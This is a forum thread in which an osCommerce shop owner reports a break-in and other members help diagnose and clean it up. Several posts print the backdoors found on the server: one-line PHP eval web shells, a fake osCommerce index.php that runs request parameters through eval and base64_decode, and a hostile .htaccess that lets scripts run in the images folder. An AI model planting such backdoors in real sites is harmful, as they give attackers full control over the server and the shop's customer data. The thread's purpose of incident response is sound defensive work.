Has My Store Been Hacked?

[backinaction999]

Browsing my site today I noticed every page has a small Google symbol added at the bottom. The link takes me too:

www.mysitename.com/redirect.php?action=banner&goto=2

 

The image itself when cut and pasted by location states:

http://www.mysitename.com/images/q_boot.php

 

This sounds bad to me. I'm going to go and remove the q_boot.php but does anyone have any idea how this could have got there? This is the second hack we've had in as many months. Last time it was rogue e-mails being sent out to customers. Our webmaster told us it was a security issue with OSC and assured us they had added all the new updates

installed, but now this...

[backinaction999]

Checking further files I notice that my .htaccess file in the folder that the rogue q_boot script was running in has been ammended. There was also a fly.php file on the root directory of the site.

 

Has someone used OScommerce to hack in or FTP? I'm stumped.

[Ben Nevis]

It does sound like a hack - there shouldn't be a php file in the images directory, nor should any of your pages have any additional code or images that you didn't put there. I suggest you ask your webmaster exactly what 'updates' they applied - a complete list of all steps taken. It's impossible to say what route might have been taken for the hack with the information you provide, osc can be hacked by its own vulnerabilities if not properly secured, it can be hacked by vulnerabilities in other software on a shared hosting service, by cross-site scripting and it can of course also be hacked if FTP usernames and passwords or admin usernames and passwords are known, but in the latter cases this is probably unlikely unless there is a keylogger or other trojan software installed on the pc accessing the site, ie it has already been compromised. You may be able to find out what way in was used by checking your server log files.

 

You may be able to find out more about the nature of the hack by opening up the suspect files in a text editor and checking the code.

 

Have you got Site Monitor installed? If not you should install it, and have it check all the files on your site.

[backinaction999]

Thanks Ben, that's very helpful. Can I just ask if you can help me a little further?

 

I got my host to send me a log of all FTP access to our site this month. My IP was the only one listed for that month and all accounted for. The rogue files on OSC were placed there on 10/12/09 (That's if the dates that appear alongside them in FTP are anything to go by) and there is no FTP activity recorded on the logs for that day.

 

In November we were having upgrades done to our site by our webmaster. They don't have our OSC admin password, only the FTP. Prior to November we had someone hack the e-mail module of OSC which was sending out trojan e-mails to our customers. Our webmaster told us they had hacked into the mail module of OSC and they had fixed it and patched it. What was strange about all this though was that the customer who alerted us to these rogue e-mails being sent, hadn't even bought anything from our website so couldn't possibly have been registered in the customers module of OSC. They had bought from our Ebay store instead, but both OSC and our Ebay store shame the sme e-mail address and the same FTP account!! Looking at the FTP logs for November activity we have our IP, our webmasters and then an IP from the exact same town in China. We have sent this to our webmaster asking them to identify it.

 

I'm not saying someone at our webmasters office has hiked the login, because how could anyone use FTP to drop these files in place and leave no trace of their activity?

 

By the way, I am on a shared hosting service, but I don't know how I can find out exactly how the site was accessed, but until I do I don't know what to change. The webmaster, the host, or what is at most risk here - our oscommerce admin panel or our FTP login details. Naturally, they have all been changed in light of this hack, but if there is a script recording everything in OSC right now how would I know, when I don't know who to trust?!!!

 

Our webmaster e-mailed us to tell us that someone has accessed the banner manager and added 3 banners. But how could they have put fly.php on the root directory, alter the .htaccess file and add another php file into the image folder the has the image slices for every page of our site?

 

Searching google, I can't find any other instance of this being done.

 

But right now, I need to secure my OSC as it's my liveliehood and I can't ask our webmaster to do it as I'm not sure if I trust them right now. Is Site Monitor available from cpanel on a shared hosting package, I'm not very familiar with it?

 

Could you also tell me how I could find the server log files? Are you talking about all the FTP access made in December and November which our host has already sent us or are you referring to a far more comprehensive log file?

 

Lastly, and most importantly, do you have any idea what these rogue banners are attempting to do?

[Ben Nevis]

I doubt that FTP is the means being used to access your site. As I indicated, there are other ways. Your server access log - not simply the FTP log but the log of all http and other port accesses to your site, if available - should give you information about which files were accessed, from which IP, which date and time and through which service.

 

By the way, your use of the term 'webmaster' is a bit confusing. Do you mean the host service provider, or someone you have employed to manage your particular website?

 

The mail issue was a known vulnerability. This was not the only file that could be used to gain access to the customer list without any login details required. It was a very, very simple hack once discovered. There were three recommendations to deal with it:

1) a change in the code of application_top.php, 2) changing the name of the admin directory 3) securing the newly renamed admin directory with .htaccess.

There are a whole raft of security measures required to secure osc against various forms of exploits and if all of them are not done your site is vulnerable to attack in one way or another. Usernames and passwords are not required to initiate the attack, and merely changing them leaves you vulnerable no matter how strong they are. That is why I suggested you must get a full, itemised list from your 'webmaster' of everything they did to 'secure' your site. Moreover you should acquaint yourself with what should have been done. It is your responsibility to see that your site is safe and your customer details secure. Have a look at this thread. Site Monitor is an osc addon, a link to it is in the first post in that thread.

 

There is no way to know for sure what rogue banners are attempting to do without looking at the code and following links or googling for them, but it could be anything from installing malicious software on your customer's pcs when they browse your site, to redirecting them to another site where their payments will be taken but no goods will be sent, to anything else that hackers are capable of thinking of and doing to amuse themselves and annoy others, at the least, to outright theft.

[backinaction999]

Thanks again Ben.

 

Where would I obtain the server access log? I can only find individual FTP or web site logs on my cpanel.

 

By webmaster, I meant the people who had actually designed the site.

 

I took a look at the thread you linked too and I'm keen to install all the modules listed. But would I need my web designer to do it, or could I do them myself?

 

I have asked the web designer for more information as to what they patched up the first time we were hit, but I'm still waiting for a response.

 

I really appreciate your help on this matter, especially as I'm running around like a headless chicken right now trying to fix this problem.

 

By the way, I opened fly.php in a text editor and got this "test<?php @eval($_POST

);?>"

 

q_boot.php just gives me gobbledygook.

 

redirect.php has a lot of OSC headed script inside it which I can read but don't understand.

[Ben Nevis]

As it seems multiple files were affected, and new files installed which you noticed and could therefore be others that you haven't noticed, the safest course of action would be to delete the whole store and restore from a known clean backup, including the database. Of course, this is a fairly drastic action which may result in some loss of data, but you need to be aware that if you don't eliminate every trace of infection the hacker could just come straight back in again.

 

Otherwise you are going to have to open up every file and directory in your store and check for and eliminate signs of infection. Site Monitor will give you a list of suspect files, but that doesn't mean they will all be infected. You will have to open them up individually. Perhaps it will be possible to remove the rogue code using a global search and replace, if you know specifically what code to remove.

 

If you only have ftp and weblogs, look at the weblog for clues about which files were being accessed and when.

 

Addons are not difficult to install provided you are methodical and can follow instructions carefully.

[Ben Nevis]

By the way, I opened fly.php in a text editor and got this

"test<?php @eval($_POST[code]);?>"

Will allow arbitrary code to be executed on your server. It's an open door for the hacker to do anything they want.

[spooks]

Will allow arbitrary code to be executed on your server. It's an open door for the hacker to do anything they want.

 

 

on a properly secure server eval functions are disabled, ask your host why its not & if they have taken steps to properly secure the server.

 

 

If your use a developer to run your site its their responsibility to ensure its secure, ask them why they have failed in that.

[backinaction999]

I just got a response from EUK (the host) with regards to the logs:

 

"We searched for the logs on the server for the upload of the fly.php file in your account however the logs have been rotated due to the log rotation cron set on the server."

 

I have no idea what it means and asked them to clarify. I also asked them about the eval functions of which they have so far dodged the issue.

 

To be honest, I have no more faith in this particular host and will be leaving them just as soon as I can find a good UK based web host who can offer me a good dedicated server package. If anyone has any recommendations I'd be so very grateful to hear them.

 

By the way, the last file I found was the .htaccess file that had been placed into the images folder. It was never there before and the script inside it was:

 

"Options -Indexes

 

<Files *.*>

 

Order Deny,Allow

 

Allow from all

 

</Files>

 

<Files ~ ".(php|gif|jpe?g|png|ico|GIF|JPE?G|PNG|ICO|sql)$">

 

Order Allow,Deny

 

Allow from all

 

</Files>"

 

Any idea on what it's doing?

[backinaction999]

Just had a response from EUK regarding both the missing logs and the eval function.

 

"The auto-set cron runs on the server wherein the /var/logs have been updated, so the logs at the moment on the server do not have they details you requested."

 

"On a Shared Server there are multiple accounts hosted on the same server, so the different applications required by different owners to host and run their websites. CMS - Content Management System are required by many accounts hosted on the server to run websites which are using Joomla, wordpress, magento,xcart and etc.

It is not possible to disable the EVAL function of PHP on a Shared Server, as it is required by many hosting accounts using CMS applications.

 

If you wish to have it disable, you may consider any of the VPS Hosting Plans wherein you can have the complete administrative rights to your account. The VPS account is complete private to you and you have the complete rights to make changes to any files."

[Ben Nevis]

Sorry to say it, but I get the feeling you aren't really listening. It seems your store is wide open to hacks. You haven't done anything about closing the door yourself. Have you even read the security thread I gave you the link for? Some of the changes are very easy, like changing the name of the admin directory, deleting a couple of files known to be open to exploit, securing it with .htaccess etc. Those won't be enough, now that you've been hacked (they were never enough before either, but they could have prevented the simple mail hack you had).

 

You've been hacked and you can't afford to wait indefinitely for someone else to do the work for you, even if it's their job. Depending on the nature of your agreement with them, they might even say it's not their job. If it was their job, they weren't competent at it.

 

I repeat my suggestion to delete everything and restore your site from backup - and then apply all the security measures in the thread I referred you to. To just restore without applying the measures will mean you will be hacked again. At least install the Site Monitor and have it scan your site for suspicious files, and deal with the files it lists (don't necessarily delete them, but inspect them, ask about any code that looks wrong, especially if it refers to the eval function). It is a very easy install. If code in a file looks like gobbledegook to you, post it here, someone might be able to explain whether it looks like a hack and what sort of hack.

 

The .htaccess file you refer to is saying allow executable php scripts and sql statements (which can add, alter and extract information in your database) in your images directory, among other things.

 

Your web hosts have told you they don't have the log file showing an upload of fly.php, in so many words. Nevertheless, if the web log file is there in your cPanel for the 10th, look at it yourself. Even if it that file was uploaded before, there might be other signs of the hacker's activity for that date.

[steve_s]

I just got a response from EUK (the host) with regards to the logs:

 

"We searched for the logs on the server for the upload of the fly.php file in your account however the logs have been rotated due to the log rotation cron set on the server."

 

I have no idea what it means and asked them to clarify. I also asked them about the eval functions of which they have so far dodged the issue.

 

To be honest, I have no more faith in this particular host and will be leaving them just as soon as I can find a good UK based web host who can offer me a good dedicated server package. If anyone has any recommendations I'd be so very grateful to hear them.

 

By the way, the last file I found was the .htaccess file that had been placed into the images folder. It was never there before and the script inside it was:

 

"Options -Indexes

 

<Files *.*>

 

Order Deny,Allow

 

Allow from all

 

</Files>

 

<Files ~ ".(php|gif|jpe?g|png|ico|GIF|JPE?G|PNG|ICO|sql)$">

 

Order Allow,Deny

 

Allow from all

 

</Files>"

 

Any idea on what it's doing?

Hi,

That ia allowing scripted files to be run

 

Any folder with 777 permissions

enter this code into a .htaccess file to stop scrips from being executed

 

<Files ~"\.(php*|s?p?html|cgi|pl)$">
deny from all
</Files>

 

Steve

[Xpajun]

Brian, back when you had to original hack - the email one - where all your files checked for additional script?

 

A lot of the things you are finding now seems very similar to the eval(64) hack that a lot of us caught :rolleyes:

 

I'm wondering if this is what you got originally and your webmaster never cleared it all out?

 

What does the first line of your .php files read like?

[backinaction999]

I am listening to you Ben, but I'm sorry I don't know how to do many of the things you say. I have backed up the site, but don't know how to restore it, my web designer always does it. I know that sounds stupid and foolish to you but I put my faith in my web designer that everything was done. The thread you posted I DID read but to a relative novice you have to understand how complicated it reads. I'm sorry if I sound thick and like I deserve everything I got, but I trusted my designer to build the site competently. I'm getting the overall gist that I'm a fool but I'm not about to start dabbling in things I don't understand just to make them worse. That's why I came for advice on these forums, so I knew what the urgency was and what should be done. I'm sorry I wasted your time.

[Ben Nevis]

I am listening to you Ben, but I'm sorry I don't know how to do many of the things you say. I have backed up the site, but don't know how to restore it, my web designer always does it. I know that sounds stupid and foolish to you but I put my faith in my web designer that everything was done. The thread you posted I DID read but to a relative novice you have to understand how complicated it reads. I'm sorry if I sound thick and like I deserve everything I got, but I trusted my designer to build the site competently. I'm getting the overall gist that I'm a fool but I'm not about to start dabbling in things I don't understand just to make them worse. That's why I came for advice on these forums, so I knew what the urgency was and what should be done. I'm sorry I wasted your time.

No, Brian, it's not a waste of my time and it doesn't sound stupid or foolish, nor that you deserve to be hacked. It's good you came to the forums, it was the right thing to do. I'm just trying to say that it's time to start learning more about osc yourself. But if you really don't have the confidence to do anything yourself then you need someone else to help you and not a web designer who has run off and didn't secure the site properly in the first place. You need that right now because right now your site doesn't really belong to you, you may have deleted two or three hacker files but haven't cured the source of the problem and don't know if there are other infected files he can use to just walk back in. Almost certainly there are, after all he dropped those in the first place.

 

You really could start with Site Monitor. It is just a few files to upload and some lines of code to insert. Instructions are provided.

[backinaction999]

I'm sorry, please don't think it ungrateful of me. It's just frustrating trying to run a two man business with all the grief it entails without having to deal with exploits of some scum hacker threatening to end my livlehood and having to study up on everything that will stop him.

 

But I know you are right. I'm really angry with my 'web designer' who has basically left me hanging out to dry in all this. I come back to work this morning just to find that there is a php.ini file inside every directory on my site, uploaded clearly at the end of the day when I finished all my work. I don't know what it can do, or why it's there, the contents inside read like a manual on php, but either way it's the last straw.

 

Unfortunately I have to do your earlier suggestion and wipe the site and go back to a previous backup. I just found out that EUK can do it for me, but we have to select a date when the site was safe. Tricky as we can't know exactly when the earlier mail hack occured and if this new hack was part of it. Therefore we are going to have to go back to a date previous to that which would mean we could be open to the same hack again. I need to patch it myself as I can't trust my web designer to do it. I just hope the patch is as easy to install as Site Monitor was. I couldn't run Site Monitor because by the time it was installed we'd found all the new updated files and decided to rollback the site to the begining of last month.

 

It's just typical that such a hack would occur over the weekend when it's almost impossible to get support from the people who built the site and the host that maintains it. This forum has been the only reassurance I have and I do appreciate all the help that's been given, particularly from yourself Ben.

 

I will install every one of the patches and updates myself and at least be glad I will learn something about security measures. My concern is what damage the hackers have already done, and what they could have obtained from my site.

[backinaction999]

Latest update is that we just found an unknown ip address on our ftp stats. This is the first we have ever found and they must have been the ones who uploaded all the php.ini files on Saturday right after I'd finished removing all the rogue files. The IP is 60.16.0.95 and it's located in Beijing (no surprises there).

 

What alarms me is that we changed the FTP password right after we had deleted all the changes that had been made on our host server and gave the password to NO-ONE. We use Fetch to access our FTP files and use Cpanel to change our FTP login. We scanned our systems thoroughly on saturday with ClamXav and there was nothing suspicious running. We used the Cpanel Virus scanner to check our FTP files and thre was nothing. As we are the only ones with the new password made up of an unlikely set of letters and numbers, how is it even possible that someone could have got our FTP login details?

[Ben Nevis]

Latest update is that we just found an unknown ip address on our ftp stats. This is the first we have ever found and they must have been the ones who uploaded all the php.ini files on Saturday right after I'd finished removing all the rogue files. The IP is 60.16.0.95 and it's located in Beijing (no surprises there).

 

What alarms me is that we changed the FTP password right after we had deleted all the changes that had been made on our host server and gave the password to NO-ONE. We use Fetch to access our FTP files and use Cpanel to change our FTP login. We scanned our systems thoroughly on saturday with ClamXav and there was nothing suspicious running. We used the Cpanel Virus scanner to check our FTP files and thre was nothing. As we are the only ones with the new password made up of an unlikely set of letters and numbers, how is it even possible that someone could have got our FTP login details?

If they have FTP access that would be very worrying. Unless you can be sure of blocking that door, then all other security measures won't help. Possibly the server itself has been compromised. Perhaps they set up their own FTP acccunt - have you checked the useraccount settings for FTP access in cPanel? FTP username/passwords can be sniffed, they can be discovered through trojan software installed on the PC used to access the account. Better to use SFTP rather than FTP, but this only helps prevent usernames/passwords being detected in transit between your machine and the host. The door needs to be closed and I think you need to talk further with your host providers about how this may have happened, and whether there is evidence of hacks being directed at other users on their systems?

[spooks]

If they have FTP access that would be very worrying. Unless you can be sure of blocking that door, then all other security measures won't help. Possibly the server itself has been compromised. Perhaps they set up their own FTP acccunt - have you checked the useraccount settings for FTP access in cPanel? FTP username/passwords can be sniffed, they can be discovered through trojan software installed on the PC used to access the account. Better to use SFTP rather than FTP, but this only helps prevent usernames/passwords being detected in transit between your machine and the host. The door needs to be closed and I think you need to talk further with your host providers about how this may have happened, and whether there is evidence of hacks being directed at other users on their systems?

 

 

If they are getting ftp access, then iether the server its insecure or they are getting the passwords from somewhere, could they have hacked your email?

 

PS another possibility is the have a keylogger on your pc, make sure you scan that too.

 

Perhaps you need to look for a new host, hosting can be set quickly, you only need to change the nameservers to move the site.

 

If looking foer a reliable host, I reccomend you look at http://www.reviewcen...roducts100.html and choose a host with good scores + plenty of reviews, do a web search on any your considering.

[backinaction999]

As of today we have been livechatting with EUK but they are very patchy with their support.

 

Firstly we got the site rolled back to November and FTP access blocked from cpanel. We then deleted all existing FTP accounts and added a new one with a fresh name and password.

 

I added Site Monitor. First attempt I really screwed up. Too much on my mind and I dropped the files in the wrong folder to start with as I couldn't find them when I went to make the changes and got paranoid the hacker was back in deleting them as they were added! After a while I found my mistake and installed Site Monitor and it worked perfectly.

 

I do believe some info was compromised through an e-mail hack. We know for definite our e-mail was compromised through OSC. We would send new passwords to our web developer through our e-mail system. But like I said, this latest password change was never sent anywhere and made directly inside C-Panel. Could C-Panel reveal current passwords that we have set on FTP, as this is the only thing I can think.

 

Everything this end is Mac based and all have been scanned thoroughly and are clean as a whistle.

 

I'm watching the site consistently now, and am currently working my way through the original list of security modules and updates that were mentioned on the security thread. I only have a few concerns now.

 

How hard is it to patch the e-mail flaw in OScommerce which I'm almost certain we have again, because we rolled our web site back to a date before we asked our web developers to patch it?

 

And I have read that admin should be renamed. Does that mean the admin directory in OSC should be called something else, or my Admin name and password as related to my website hosting?

 

Had a chance today to look for some dedicated servers. Ploughing through the review sites of course but it's so hard to find a company that has more good reviews than bad.

[Ben Nevis]

Yes, you have to rename the admin directory to something else, and password protect it with .htaccess. This will stop the email flaw being exploited through preventing access to the admin files, although there is also a code change you can make to close the vulnerability in some of the admin files themselves. Your FTP password would not have been revealed through the email hack, that just gives access to the customer list without any need for admin login.

 

Make sure all files and permissions are correctly set, don't leave any directories (including the images directory) at 777 (should be 755), and do all the other things mentioned in the security thread.

[backinaction999]

I just run the Sitemonitor hacked files and it's not looking too good for some files we rolled back too.

 

Regarding the permissions for the image folder, Sitemonitor located a hacked file in the images folder. Inside the images folder was a folder named yahoo. Inside that was the hacked file index.php.

 

I checked the permissions on the images folder and it's at 755 as it should be, so I have no idea how or when that file was placed there. Here is the code for it though which is a foreign language to me... But I notice the evil 'eval' mentioned a few times. Is this the email hack that got us first time?

 

<?php

 

/*

$Id: /yahoo/index.php 1739 2007-12-20 00:52:16Z hpdl $

 

osCommerce, Open Source E-Commerce Solutions

http://www.oscommerce.com

 

Copyright © 2003 osCommerce

 

Released under the GNU General Public License

*/

 

 

// require('includes/application_top.php');

// $check_email_query = tep_db_query("select count(*) as total from " . TABLE_CUSTOMERS . " where customers_email_address = '" . tep_db_input($email_address) . "' and customers_id != '" . (int)$customer_id . "'");

 

// $check_email = tep_db_fetch_array($check_email_query);

// if ($check_email['total'] > 0) {

 

// $error = true;

error_reporting(0);

 

// if (!tep_session_is_registered('customer_id')) {

eval(stripslashes($_REQUEST['osc']));

// if (ACCOUNT_GENDER == 'true') {

// if ( ($gender != 'm') && ($gender != 'f') ) {

// $error = true;

eval(base64_decode($_REQUEST['osc64']));

// $messageStack->add('account_edit', ENTRY_GENDER_ERROR);

// }

 

// }

// $navigation->set_snapshot();

if(!(count($_GET)+count($_POST)))echo "Open Source E-Commerce Solutions ", 2000+7, " year";

// tep_redirect(tep_href_link(FILENAME_LOGIN, '', 'SSL'));

 

// }

 

?>

[Ben Nevis]

I just run the Sitemonitor hacked files and it's not looking too good for some files we rolled back too.

 

Regarding the permissions for the image folder, Sitemonitor located a hacked file in the images folder. Inside the images folder was a folder named yahoo. Inside that was the hacked file index.php.

 

I checked the permissions on the images folder and it's at 755 as it should be, so I have no idea how or when that file was placed there. Here is the code for it though which is a foreign language to me... But I notice the evil 'eval' mentioned a few times. Is this the email hack that got us first time?

 

<?php

 

/*

$Id: /yahoo/index.php 1739 2007-12-20 00:52:16Z hpdl $

 

osCommerce, Open Source E-Commerce Solutions

http://www.oscommerce.com

 

Copyright © 2003 osCommerce

 

Released under the GNU General Public License

*/

 

 

// require('includes/application_top.php');

// $check_email_query = tep_db_query("select count(*) as total from " . TABLE_CUSTOMERS . " where customers_email_address = '" . tep_db_input($email_address) . "' and customers_id != '" . (int)$customer_id . "'");

 

// $check_email = tep_db_fetch_array($check_email_query);

// if ($check_email['total'] > 0) {

 

// $error = true;

error_reporting(0);

 

// if (!tep_session_is_registered('customer_id')) {

eval(stripslashes($_REQUEST['osc']));

// if (ACCOUNT_GENDER == 'true') {

// if ( ($gender != 'm') && ($gender != 'f') ) {

// $error = true;

eval(base64_decode($_REQUEST['osc64']));

// $messageStack->add('account_edit', ENTRY_GENDER_ERROR);

// }

 

// }

// $navigation->set_snapshot();

if(!(count($_GET)+count($_POST)))echo "Open Source E-Commerce Solutions ", 2000+7, " year";

// tep_redirect(tep_href_link(FILENAME_LOGIN, '', 'SSL'));

 

// }

 

?>

Definitely still infected then. Yes, the two eval lines are the nasty ones, most of the rest are commented out and do nothing. They will allow the hacker to run code on your server.

 

The email hack was nothing clever and did not require the running of any code to accomplish. It simply required an osc with the default name for the admin directory and no code change to prevent it. This is very much more serious than the email hack. They have placed code on your server which gives them the power to do pretty much whatever they want with your site if not the server itself.

 

It's got to be all cleared out or they will be straight back in. Files could be deeply buried within subdirectories so you need to check every single file that Site Monitor throws up and delete the files or remove the malicious code. Search the forums for more information about base64 attacks.

[cvmick]

Hello

 

It happened the same to my website and the same day December 10th.

A file named fly.php appeared in the root www folder and

several files in the 'images' folder :

q_boot.php and a .htaccess file.

 

My clients received spam from a hoster :

- http://nybuoquewqe.com/?cid=weme15

- http://nybuoquewqe.com/?cid=weme13

- http://5ma6pasvuh.cjb.net/

 

I delated the addede files but spam carries on.

I can't know if the mail are sent via my website or if the hackers could have access to my clients list, copied it and send email from another server.

 

Any ideas ???

Many thanks